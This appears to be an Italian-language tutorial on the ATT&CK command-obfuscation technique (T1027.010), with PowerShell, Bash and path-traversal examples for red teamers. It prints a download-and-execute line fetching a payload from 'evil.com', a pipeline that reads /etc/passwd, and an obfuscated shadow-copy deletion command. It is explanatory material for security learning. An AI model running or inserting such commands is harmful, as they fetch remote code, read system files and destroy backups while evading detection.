Offuscamento di Comandi: Obfuscated Commands (T1027.010)

L'offuscamento dei comandi rappresenta una tecnica sofisticata che permette agli attaccanti di nascondere le loro intenzioni malevole dietro layer di codifica e trasformazione sintattica. Questa metodologia si inserisce nella tattica TA0005 (Defense Evasion), posizionandosi strategicamente nella kill chain per evitare il rilevamento durante l'esecuzione di payload dannosi.

La tecnica sfrutta le caratteristiche native dei linguaggi di scripting per rendere illeggibili comandi altrimenti banali. PowerShell, Bash e altri interpreti diventano strumenti di dissimulazione attraverso encoding Base64, concatenazione di stringhe, escape character e directory traversal. 28 gruppi APT hanno documentato l'uso di questa tecnica, con 31 famiglie di malware che la integrano nativamente.

L'impatto è significativo: dalla campagna Frankenstein del 2019 fino alla recente SharePoint ToolShell Exploitation del 2025, l'offuscamento rimane una costante nelle operazioni cyber più sofisticate.

L'arte dell'offuscamento inizia con tecniche basilari che ogni red teamer dovrebbe padroneggiare. Su Windows, il comando più semplice può essere trasformato in modo irriconoscibile:

powershell -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==

Questo esegue un innocuo "Get-Process" attraverso encoding Base64. Ma possiamo spingerci oltre con Invoke-Obfuscation, il framework utilizzato da APT32 e MuddyWater. Dopo aver importato il modulo, la magia avviene con:

Invoke-Obfuscation -ScriptBlock {IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')} -Command 'Token\All\1,Encoding\1'

Su Linux, la creatività non ha limiti. I threat actor sfruttano il command substitution e il piping creativo:

echo 'd2hvYW1p' | base64 -d | bash rev <<<'tac /etc/passwd' | sh

La directory traversal aggiunge un ulteriore layer di confusione. Turla ha dimostrato l'efficacia di questa tecnica con path contorti:

C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete

Per automatizzare l'offuscamento su larga scala, Invoke-DOSfuscation permette di trasformare batch script in puzzle sintattici. Il comando diventa un labirinto di variabili d'ambiente e caratteri di escape che mantiene la stessa funzionalità originale mentre evade le signature tradizionali.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo